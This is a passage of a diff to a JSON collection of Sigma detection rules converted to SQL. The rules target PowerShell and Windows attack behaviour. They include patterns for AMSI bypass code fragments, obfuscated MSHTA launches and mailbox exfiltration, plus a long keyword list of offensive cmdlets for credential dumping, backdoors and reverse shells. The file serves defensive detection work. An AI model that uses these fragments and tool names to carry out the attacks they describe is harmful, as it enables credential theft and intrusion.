('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" ], - "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" + "filename": "posh_ps_ntfs_ads_access.yml" }, { - "title": "Microsoft Defender Blocked from Loading Unsigned DLL", - "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", + "title": "AMSI Bypass Pattern Assembly GetType", + "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to 
sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1562.001", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" ], - "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" + "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" }, { - "title": "HybridConnectionManager Service Running", - "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "tags": [ - "attack.persistence", - "attack.t1554" + "title": "Suspicious PowerShell Mailbox Export to Share - PS", + "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", + "status": "experimental", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.exfiltration" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." 
+ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "win_hybridconnectionmgr_svc_running.yml" + "filename": "posh_ps_mailboxexport_share.yml" }, { - "title": "Standard User In High Privileged Group", - "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", + "title": "Invoke-Obfuscation Via Stdin - Powershell", + "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", "status": "experimental", - "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", - "author": "frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. 
They should be filtered out using the \"TargetUserName\" field" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" ], - "filename": "win_lsa_server_normal_user_admin.yml" + "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" }, { - "title": "Loading Diagcab Package From Remote Path", - "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", + "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", "status": "experimental", - "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate package hosted on a known and authorized remote location" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE 
'\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "Direct Syscall of NtOpenProcess", - "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", - "status": "experimental", - "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", - "author": "Christian Burkard (Nextron Systems), Tim Shelton", + "title": "Malicious PowerShell Commandlets - ScriptBlock", + "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", "tags": [ "attack.execution", - "attack.t1106" + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR 
(TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE 
'%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADR%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRExcel%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRHTML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRJSON%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRXML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Get-ADIDNS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' 
OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText 
LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" + "filename": "posh_ps_malicious_commandlets.yml" }, { - 
"title": "SysmonEnte Usage", - "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", - "status": "experimental", - "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell Credential Prompt", + "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "status": "test", + "description": "Detects PowerShell calling a credential prompt", + "author": "John Lambert (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.credential_access", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" ], - "filename": "proc_access_win_hack_sysmonente.yml" + "filename": "posh_ps_prompt_credentials.yml" }, { - "title": "Suspicious LSASS Access Via MalSecLogon", - "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", - "status": "experimental", - "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", - "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", + "title": "Request A Single Ticket via PowerShell", + "id": "a861d835-af37-4930-bcd6-5b178bfb54df", + "status": "test", + "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single 
computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" ], - "filename": "proc_access_win_susp_seclogon.yml" + "filename": "posh_ps_request_kerberos_ticket.yml" }, { - "title": "Potential Svchost Memory Access", - "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", + "id": "e54f5149-6ba3-49cf-b153-070d24679126", "status": "experimental", - "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", - "author": 